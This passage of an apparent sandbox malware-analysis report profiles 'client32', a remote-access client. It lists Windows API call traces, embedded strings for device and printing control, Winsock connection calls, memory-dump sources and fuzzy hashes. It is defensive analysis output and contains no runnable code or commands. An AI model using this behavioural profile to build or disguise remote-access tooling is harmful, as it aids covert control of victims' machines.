                                                        • SetTimer.USER32(00000000,00000001,000002EE,00000000), ref: 1101D28C
                                                        • SetWindowTextA.USER32(00000000,00000000), ref: 1101D255
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$DeleteEnableErrorExitInvalidateLastMessageObjectProcessRectTextTimerwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2329730260-1557312927
                                                        • Opcode ID: 495e5cdad597b9cdb94b14c15a770d57a151504633e1c97aa44e3dbf2d83e9b8
                                                        • Instruction ID: c8a0ada2fc9048c31c9f756b7ea63b130b06c90983f76905bbf0c43349d37983
                                                        • Opcode Fuzzy Hash: 495e5cdad597b9cdb94b14c15a770d57a151504633e1c97aa44e3dbf2d83e9b8
                                                        • Instruction Fuzzy Hash: D8915BB9A00601AFD315DB55CC94FD6F3F6BF98318F1086A8EA5A4B285D770F881CB91
                                                        APIs
                                                        Strings
                                                        • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103B42B
                                                        • SETOPTICALDRIVEACCESS, xrefs: 1103B3E4
                                                        • IsA(), xrefs: 1103B454
                                                        • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103B3FF
                                                        • BLOCKPRINTING, xrefs: 1103B40D
                                                        • SETUSBMASSSTORAGEACCESS, xrefs: 1103B3B3
                                                        • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103B432
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1103B44F
                                                        • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103B3D6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _malloc_memmove
                                                        • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
                                                        • API String ID: 1183979061-2531374130
                                                        • Opcode ID: f08ecb250d5c08f7971151e8345e671584c0b4aeb0ad882087bea4862500d0ab
                                                        • Instruction ID: df2692623f623c820235428dac45199c8cf8223a54f9d11746ef9c8afc1f3fc0
                                                        • Opcode Fuzzy Hash: f08ecb250d5c08f7971151e8345e671584c0b4aeb0ad882087bea4862500d0ab
                                                        • Instruction Fuzzy Hash: E241A17AA00616AFCB01CF64DC90FDEB7F9EF45219F048569E855A7241EB35F908CBA0
                                                        APIs
                                                        • RegisterClassA.USER32(111D925C), ref: 11059432
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • CreateWindowExA.USER32(00000000,NSMCobrProxy,11182200,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11059473
                                                        • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 110594FD
                                                        • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 11059520
                                                        • TranslateMessage.USER32(?), ref: 11059536
                                                        • DispatchMessageA.USER32(?), ref: 1105953C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                        • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                        • API String ID: 13347155-1383313024
                                                        • Opcode ID: 0e78c6e4fd56c04fe32ffe47ec9c10ecf785ae34a99339cc59077458bec90890
                                                        • Instruction ID: 5c93ab26ba0373098ed229eca1638e6ca81362b407f281ecacd63ac87fa716a6
                                                        • Opcode Fuzzy Hash: 0e78c6e4fd56c04fe32ffe47ec9c10ecf785ae34a99339cc59077458bec90890
                                                        • Instruction Fuzzy Hash: C0419076E00746AFDB51DF65CC84F9AFBF5AB44718F408569F91697280FB70A800CBA1
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000), ref: 1111534F
                                                        • InterlockedExchange.KERNEL32(111DC144,00000001), ref: 11115375
                                                        • CreateWindowExA.USER32(00000000,button,11182200,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 111153BB
                                                        • SetWindowLongA.USER32(00000000,000000FC,11115270), ref: 111153DB
                                                        • SetFocus.USER32(00000000), ref: 111153F2
                                                        • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 1111540C
                                                        • DestroyWindow.USER32(00000000), ref: 11115422
                                                        • InterlockedExchange.KERNEL32(111DC144,00000000), ref: 11115439
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                        • String ID: *NoHideFEP$View$button
                                                        • API String ID: 1610953178-1502386645
                                                        • Opcode ID: 4a4f39a3776c091e559f97f305575d72accde8dafeae70cae36c9c0c9739092f
                                                        • Instruction ID: 2d5a82bd362b7f12f42ba8e56494d73917878a288bb9a975525e5583549efdad
                                                        • Opcode Fuzzy Hash: 4a4f39a3776c091e559f97f305575d72accde8dafeae70cae36c9c0c9739092f
                                                        • Instruction Fuzzy Hash: 4E31A470609372EFEB908B76CDC9B5AF7A8AB06309F54453DF825D6189E7B0A440CB11
                                                        APIs
                                                          • Part of subcall function 110E2E50: LocalAlloc.KERNEL32(00000040,00000014,?,1100D56F,?), ref: 110E2E60
                                                          • Part of subcall function 110E2E50: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D56F,?), ref: 110E2E72
                                                          • Part of subcall function 110E2E50: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,1100D56F,?), ref: 110E2E84
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D587
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5A0
                                                        • _strrchr.LIBCMT ref: 1100D5AF
                                                        • GetCurrentProcessId.KERNEL32 ref: 1100D5BF
                                                        • wsprintfA.USER32 ref: 1100D5E0
                                                        • _memset.LIBCMT ref: 1100D5F1
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D629
                                                        • CloseHandle.KERNEL32(?,00000000), ref: 1100D641
                                                        • CloseHandle.KERNEL32(?), ref: 1100D64A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                        • String ID: %sNSSilence.exe %u %u$D
                                                        • API String ID: 1760462761-4146734959
                                                        • Opcode ID: 38d3bc3da6cb395c9be1672e1e0789f0a082fd9a3163fbf41da1431788ce246e
                                                        • Instruction ID: 4a2b6ea11212545f69c7d64acb08f887aa5157aeffa75dc865ae6a9c63889310
                                                        • Opcode Fuzzy Hash: 38d3bc3da6cb395c9be1672e1e0789f0a082fd9a3163fbf41da1431788ce246e
                                                        • Instruction Fuzzy Hash: 88219776E51324AFEB50DBA0CC89FDEB77C9B09708F108095F619A71C0DAB0AA44CF65
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 11133176
                                                        • GetProcAddress.KERNEL32(00000000), ref: 1113317D
                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 11133193
                                                        • GetCurrentProcessId.KERNEL32 ref: 111331B1
                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 111331BB
                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 111331CE
                                                        • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),111D6428,00000004,?), ref: 111331ED
                                                        • CloseHandle.KERNEL32(00000000), ref: 11133214
                                                        • CloseHandle.KERNEL32(00000000), ref: 1113321B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                        • String ID: ProcessIdToSessionId$kernel32.dll
                                                        • API String ID: 2536908267-3889420803
                                                        • Opcode ID: f05b8fede040130ca69cc7ab618329d48fe069b5163e5afb1fda5806a126863c
                                                        • Instruction ID: e6be192edd1e3b76cf1fdabe392791c1d0a960b91715f14bd5d837152ad25321
                                                        • Opcode Fuzzy Hash: f05b8fede040130ca69cc7ab618329d48fe069b5163e5afb1fda5806a126863c
                                                        • Instruction Fuzzy Hash: CF21C836A14214AFEB019BA58D88F9EFFBCDB88766F104155FD10D3248D730D505CB64
                                                        APIs
                                                        • IsValidSid.ADVAPI32(00000000,00000000,00000000,00000000,11085320,00000000,?,?,000F037F,00000000,00000000), ref: 110850AD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Valid
                                                        • String ID:
                                                        • API String ID: 1304828667-0
                                                        • Opcode ID: 07d1f4d55114712ce09944c96b79fb0dbf7eda27ec4e79ff2eec5c2a7d7a1562
                                                        • Instruction ID: 676b2b3de2148593dc90d10c3e1cfc66e629af1c8c3f0d5084bd27d7bb4b02fe
                                                        • Opcode Fuzzy Hash: 07d1f4d55114712ce09944c96b79fb0dbf7eda27ec4e79ff2eec5c2a7d7a1562
                                                        • Instruction Fuzzy Hash: 6A417372E0422A9FDB11CFA4CC85BAEBBB8EF44755F1041A9FC15E7248D7319901CBA1
                                                        APIs
                                                        • KillTimer.USER32(00000000,?,?,?,111B83A0), ref: 1106D358
                                                        • Sleep.KERNEL32(00000064,?,?,111B83A0), ref: 1106D3A2
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D430
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D436
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D43C
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D442
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D448
                                                        • DeleteCriticalSection.KERNEL32(?,?,?,111B83A0), ref: 1106D44E
                                                          • Part of subcall function 11103160: DeleteCriticalSection.KERNEL32(75A37AB0,82E0FB89,?,75A37AA0,00000000,?,00000000,1116FF88,000000FF,?,110B7556), ref: 111031AA
                                                          • Part of subcall function 11103160: EnterCriticalSection.KERNEL32 ref: 111031F5
                                                          • Part of subcall function 11103160: SetEvent.KERNEL32(00000264), ref: 1110321E
                                                          • Part of subcall function 11103160: CloseHandle.KERNEL32(00000264), ref: 11103252
                                                          • Part of subcall function 11103160: WaitForSingleObject.KERNEL32(00000284,000000FF), ref: 11103260
                                                          • Part of subcall function 11103160: CloseHandle.KERNEL32(00000284), ref: 1110326D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Delete$CloseHandle$EnterEventKillObjectSingleSleepTimerWait
                                                        • String ID: ..\ctl32\Connect.cpp$idata->dialup == NULL
                                                        • API String ID: 161544936-3355235989
                                                        • Opcode ID: 79aafff9eca0d463449024df2412cdea9a595f767407fb07140581a44bbbffa4
                                                        • Instruction ID: 36ddb0504334873c216a30337e86c42547ebe3cf26056ee2141bf84180dda08e
                                                        • Opcode Fuzzy Hash: 79aafff9eca0d463449024df2412cdea9a595f767407fb07140581a44bbbffa4
                                                        • Instruction Fuzzy Hash: BE51F4B9A046059FD750DBA4C884BAFF7F9AF88308F01415DE95A97280DB74B904CBA1
                                                        APIs
                                                          • Part of subcall function 111409E0: IsWindow.USER32(FFFFC554), ref: 111409ED
                                                          • Part of subcall function 111409E0: IsWindow.USER32(D8458D00), ref: 111409F7
                                                        • IsWindow.USER32(00010001), ref: 111410DB
                                                        • CreateWindowExA.USER32(00000000,AtlAxWin100,about:blank,50300000,80000000,80000000,00000000,00000000,00010001,?,11000000,00000000), ref: 11141138
                                                        • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 1114114D
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • UpdateWindow.USER32(?), ref: 11141233
                                                        • ShowWindow.USER32(?,00000005), ref: 1114123F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Message$CreateErrorExitLastProcessSendShowUpdatewsprintf
                                                        • String ID: !IsInit()$..\CTL32\WBObject.cpp$AtlAxWin100$IsWindow(hwndPar)$about:blank
                                                        • API String ID: 3766702438-2471897277
                                                        • Opcode ID: 6ea1114ac6ccd361845ebdefb1f7c21c818829f08718dc757a911fc34c2f1f58
                                                        • Instruction ID: 89a1e59c23e27b181d28c6aea5168aafdb7a37f1fac42e7899e5da6e401d876f
                                                        • Opcode Fuzzy Hash: 6ea1114ac6ccd361845ebdefb1f7c21c818829f08718dc757a911fc34c2f1f58
                                                        • Instruction Fuzzy Hash: EF5153B9B00645AFDB04DFA9CD85FAAFBE9EB49604F108528F519D7784E730E900CB51
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 110FB0BE
                                                        • EnterCriticalSection.KERNEL32(111DBDA4), ref: 110FB0D1
                                                        • GetTickCount.KERNEL32 ref: 110FB0D7
                                                        • GetTickCount.KERNEL32 ref: 110FB223
                                                        • LeaveCriticalSection.KERNEL32(111DBDA4), ref: 110FB22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$CriticalSection$EnterLeave
                                                        • String ID: IsA()$TerminateVistaUI$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 956672424-1347840706
                                                        • Opcode ID: 9c62ae52d175db9da93bd6ceb374a3324fc362af68b10af75ace81d4a3c5c9fa
                                                        • Instruction ID: 4ec3a70211b026e7dbc4eeca6b9a79e7af00bbee3c8de0b8751296dd8e751a9c
                                                        • Opcode Fuzzy Hash: 9c62ae52d175db9da93bd6ceb374a3324fc362af68b10af75ace81d4a3c5c9fa
                                                        • Instruction Fuzzy Hash: 2E519C79E0065AAFDB04DFA5D884B9EF7F4FF55318F0481A8E815A7251E730AD44CB90
                                                        APIs
                                                        • GetClientRect.USER32(?,11079302), ref: 11075430
                                                        • BeginDeferWindowPos.USER32(00000008), ref: 11075443
                                                        • GetTopWindow.USER32(?), ref: 11075457
                                                        • GetClassNameA.USER32(00000000,00000000,00000020), ref: 11075477
                                                        • GetWindowLongA.USER32(00000000,00000000), ref: 110754AC
                                                        • GetWindow.USER32(00000000,00000002), ref: 110754C0
                                                        • CopyRect.USER32(00000002,11079302), ref: 110754DF
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000017), ref: 11075527
                                                        • EndDeferWindowPos.USER32(00000000), ref: 11075535
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$DeferRect$BeginClassClientCopyLongName
                                                        • String ID: NSMCoolbar
                                                        • API String ID: 1900817757-4124301854
                                                        • Opcode ID: 721ac4e266f96a4a850d5aaf4f4e1e8e70e9fe7eb07aeeafc09c1b7f71e7420c
                                                        • Instruction ID: 697ac5a8752ed506828de34cf2428e8b9a6e2033c0f369928a21e8fa57bdad73
                                                        • Opcode Fuzzy Hash: 721ac4e266f96a4a850d5aaf4f4e1e8e70e9fe7eb07aeeafc09c1b7f71e7420c
                                                        • Instruction Fuzzy Hash: 7741AF75E00699AFDB01CF64D8C5AEDFBF5EF49318F1081A9EC95A7240EB329900CB54
                                                        APIs
                                                          • Part of subcall function 110D37D0: EnterCriticalSection.KERNEL32(111D8C5C,11017228,82E0FB89,?,?,?,111B83A0,11175D28,000000FF,?,11019222), ref: 110D37D1
                                                        • __CxxThrowException@8.LIBCMT ref: 110CD0C0
                                                          • Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3
                                                        • gethostbyname.WSOCK32(111D8BD0,82E0FB89,00000000,?,00000000), ref: 110CD0D5
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174E50,000000FF), ref: 110CD0E1
                                                        • _memmove.LIBCMT ref: 110CD10B
                                                        • htons.WSOCK32(00000000), ref: 110CD131
                                                        • socket.WSOCK32(00000002,00000001,00000000), ref: 110CD141
                                                        • WSAGetLastError.WSOCK32 ref: 110CD14F
                                                        • connect.WSOCK32(?,?,00000010,?,00000000,000000FF,111D8BE8,00000000,000000FF), ref: 110CD183
                                                        • WSAGetLastError.WSOCK32 ref: 110CD18E
